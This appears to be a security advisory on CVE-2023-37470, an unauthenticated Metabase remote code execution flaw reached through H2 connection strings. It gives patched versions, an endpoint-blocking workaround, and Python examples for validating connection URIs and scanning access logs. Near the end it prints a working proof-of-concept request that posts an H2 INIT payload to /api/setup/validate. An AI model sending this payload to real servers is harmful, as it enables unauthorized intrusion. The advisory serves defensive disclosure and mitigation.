Metabase is an open-source business intelligence and analytics platform, widely used for its easy-to-use interface and its many database connectors. It was recently discovered that Metabase versions prior to 0.43.7.3, 0.44.7.3, 0.45.4.3, 0.46.6.4, 1.43.7.3, 1.44.7.3, 1.45.4.3, and 1.46.6.4 contain a vulnerability that could expose servers to remote code execution.

The core issue lies in H2, the embedded in-memory database that Metabase supports as one of its data warehouses. H2 exposes several settings through which executable code can be injected via the connection string. Because Metabase lets users connect to databases through user-supplied connection strings, this behaviour can be exploited.

Metabase provides a validation API that checks connection strings before a database is added, including during the initial setup of the platform. This validation API is the primary vector for exploitation, as it can be reached without an authenticated session.
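The following is an added example, not Metabase's own code, of how a server-side check on a user-supplied database definition can reject the H2 engine outright (which is what the fix does) and, as defense in depth, reject any JDBC URI whose subprotocol is H2 or whose settings would execute SQL when the connection is opened. The allowlist of engines, the engine-to-subprotocol map, and the payload shape are assumptions modelled on the JSON shown later on this page.

```python
from urllib.parse import unquote

# Assumed allowlist of engines the check still permits. H2 is deliberately
# absent, mirroring the fix that removed the ability to add H2 databases.
ALLOWED_ENGINES = {"postgres", "mysql", "sqlite"}

# Assumed mapping from Metabase engine name to the JDBC subprotocol it should use.
ENGINE_SUBPROTOCOLS = {"postgres": "postgresql", "mysql": "mysql", "sqlite": "sqlite"}

# H2 connection settings that run SQL or scripts as soon as the connection opens.
# Rejected regardless of engine in case an H2-style URI is smuggled under another name.
DANGEROUS_SETTINGS = ("INIT", "RUNSCRIPT")


def parse_jdbc_uri(uri: str):
    """Split 'jdbc:<subprotocol>:<path>;KEY=VALUE;...' into (subprotocol, settings)."""
    uri = unquote(uri)  # undo percent-encoding so INIT%3D... cannot hide a setting
    if not uri.lower().startswith("jdbc:"):
        raise ValueError("not a JDBC URI")
    body = uri[len("jdbc:"):]
    subprotocol, _, rest = body.partition(":")
    settings = {}
    # The first ';'-separated segment is the database path or name; the rest are settings.
    for part in rest.split(";")[1:]:
        key, _, value = part.partition("=")
        if key.strip():
            settings[key.strip().upper()] = value
    return subprotocol.lower(), settings


def check_database_details(payload: dict):
    """Return (accepted, reason) for a database definition like the one POSTed to /api/database."""
    engine = str(payload.get("engine", "")).lower()
    if engine not in ALLOWED_ENGINES:
        return False, f"engine {engine!r} is not permitted"
    uri = payload.get("details", {}).get("connection-uri")
    if uri is None:
        return True, "no connection URI supplied"
    try:
        subprotocol, settings = parse_jdbc_uri(uri)
    except ValueError as exc:
        return False, str(exc)
    if subprotocol == "h2":
        return False, "H2 connection URIs are not permitted"
    if subprotocol != ENGINE_SUBPROTOCOLS[engine]:
        return False, f"URI subprotocol {subprotocol!r} does not match engine {engine!r}"
    for key in settings:
        if key in DANGEROUS_SETTINGS:
            return False, f"setting {key} executes SQL on connect"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample: an H2 definition using the INIT setting, and a benign Postgres one.
    samples = [
        {"engine": "h2", "details": {"connection-uri": "jdbc:h2:mem:;INIT=CREATE USER x PASSWORD 'y';"}},
        {"engine": "postgres", "details": {"connection-uri": "jdbc:postgresql://db.internal:5432/app"}},
    ]
    for sample in samples:
        print(sample["engine"], check_database_details(sample))
```

The engine allowlist alone is what closes the reported issue; the subprotocol and settings checks exist so that a later change to the allowlist does not silently reopen the H2 path.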

To mitigate this issue, Metabase has released versions 0.43.7.3, 0.44.7.3, 0.45.4.3, 0.46.6.4, 1.43.7.3, 1.44.7.3, 1.45.4.3, and 1.46.6.4, which remove the ability for users to add H2 databases entirely.

As a temporary workaround, the relevant endpoints can be blocked at the network level until the upgrade is applied: POST /api/database, PUT /api/database/:id, and POST /api/setup/validate. Additionally, users who rely on H2 as a file-based database should migrate to SQLite.
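As an added example (not from Metabase or the original post), the deny rules for the three endpoints above expressed as a small matcher, plus a scan of reverse-proxy access-log lines that reports requests hitting those routes. This is useful both for confirming that a network-level block is in place and for reviewing traffic from before it was applied. The log format (common log format) and the sample lines are constructed assumptions.

```python
import re

# The three endpoints named in the workaround; ':id' is treated as a numeric path segment.
BLOCKED_ROUTES = (
    ("POST", re.compile(r"^/api/database/?$")),
    ("PUT", re.compile(r"^/api/database/\d+/?$")),
    ("POST", re.compile(r"^/api/setup/validate/?$")),
)

# Common log format: client ident user [time] "METHOD PATH PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def is_blocked(method: str, path: str) -> bool:
    """True if the request matches one of the workaround's deny rules (query string ignored)."""
    path = path.split("?", 1)[0]
    return any(method.upper() == m and pat.match(path) for m, pat in BLOCKED_ROUTES)


def flag_log_lines(lines):
    """Return the parsed entries whose method and path hit a blocked route."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        if is_blocked(m["method"], m["path"]):
            hits.append(m.groupdict())
    return hits


# Constructed sample log lines (documentation IP ranges, not from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Aug/2023:16:15:01 +0000] "POST /api/setup/validate HTTP/1.1" 200 512',
    '198.51.100.2 - - [04/Aug/2023:16:15:03 +0000] "GET /api/database HTTP/1.1" 200 2048',
    '203.0.113.7 - - [04/Aug/2023:16:15:05 +0000] "PUT /api/database/3 HTTP/1.1" 200 640',
    '198.51.100.9 - - [04/Aug/2023:16:15:08 +0000] "POST /api/database?foo=1 HTTP/1.1" 403 0',
    '192.0.2.4 - - [04/Aug/2023:16:15:10 +0000] "GET /api/card/12 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    # A 403 on a flagged route means the block is working; a 200 means it reached Metabase.
    for hit in flag_log_lines(SAMPLE_LOG):
        print(f'{hit["client"]} {hit["method"]} {hit["path"]} -> {hit["status"]}')
```

GET /api/database is intentionally not matched: listing databases is read-only and is not among the endpoints the workaround names.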

For more information on this vulnerability and the mitigations Metabase has put into place, refer to the official Metabase GitHub repository to review the release notes for the new versions.

Here is a code snippet demonstrating a potential exploit using the vulnerable API:

import requests

# Target Metabase server (placeholder hostname)
url = 'https://your-metabase-server.com'

# Sample malicious H2 connection string; the INIT setting runs SQL as soon as H2 opens the connection
payload = {
    "engine": "h2",
    "name": "Vulnerable H2 Connection",
    "details": {
        "connection-uri": "jdbc:h2:mem:;INIT=CREATE USER REMOTE_CODE_EXECUTION PASSWORD 'remote_code_execution';"
    }
}

# Vulnerable API endpoint for validating database connections
validation_url = f"{url}/api/setup/validate"

response = requests.post(validation_url, json=payload, timeout=10)

# A 200 only indicates that the endpoint accepted and evaluated the connection string
if response.status_code == 200:
    print("Exploit successful")
else:
    print("Exploit failed")

This vulnerability, identified as CVE-2023-37470, has the potential for significant impact on Metabase servers. It is crucial for Metabase users to update their installations to the latest versions and follow the recommendations outlined above to ensure their systems remain secure.

Timeline

Published on: 08/04/2023 16:15:00 UTC
Last modified on: 08/09/2023 20:57:00 UTC